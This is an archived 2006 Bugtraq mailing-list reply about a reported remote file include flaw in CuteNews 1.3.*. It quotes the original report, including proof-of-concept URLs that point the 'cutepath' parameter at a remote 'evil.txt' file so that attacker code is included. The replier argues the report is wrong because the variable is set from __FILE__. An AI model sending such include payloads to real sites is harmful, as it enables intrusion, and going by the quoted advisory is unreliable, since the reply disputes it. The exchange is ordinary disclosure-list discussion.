[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <44F9DF7B.7060500@gmail.com>
Date: Sat, 02 Sep 2006 21:46:03 +0200
From: satalin <satalin@...il.com>
To: bugtraq@...urityfocus.com
Subject: Re: CuteNews 1.3.* Remote File Include Vulnerability
stormhacker@...mail.com wrote:
>
> -----------------Description---------------
>
>
> $cutepath = __FILE__;
>
> $cutepath = preg_replace( "'\\\search\.php'", "", $cutepath);
>
> $cutepath = preg_replace( "'/search\.php'", "", $cutepath);
>
>
> require_once("$cutepath/inc/functions.inc.php");
>
>
> --------------PoC/Exploit----------------------
>
>
> show_news.php?cutepath=http://host/evil.txt?
>
> search.php?cutepath=http://host/evil.txt?
>
$cutepath = __FILE__;
$cutepath is set to script's working directory, so you can not set it
manually.
> --------------Solution---------------------
>
>
> No Patch available.
>
>
As no needed? ;)
Greets,
satalin
Powered by blists - more mailing lists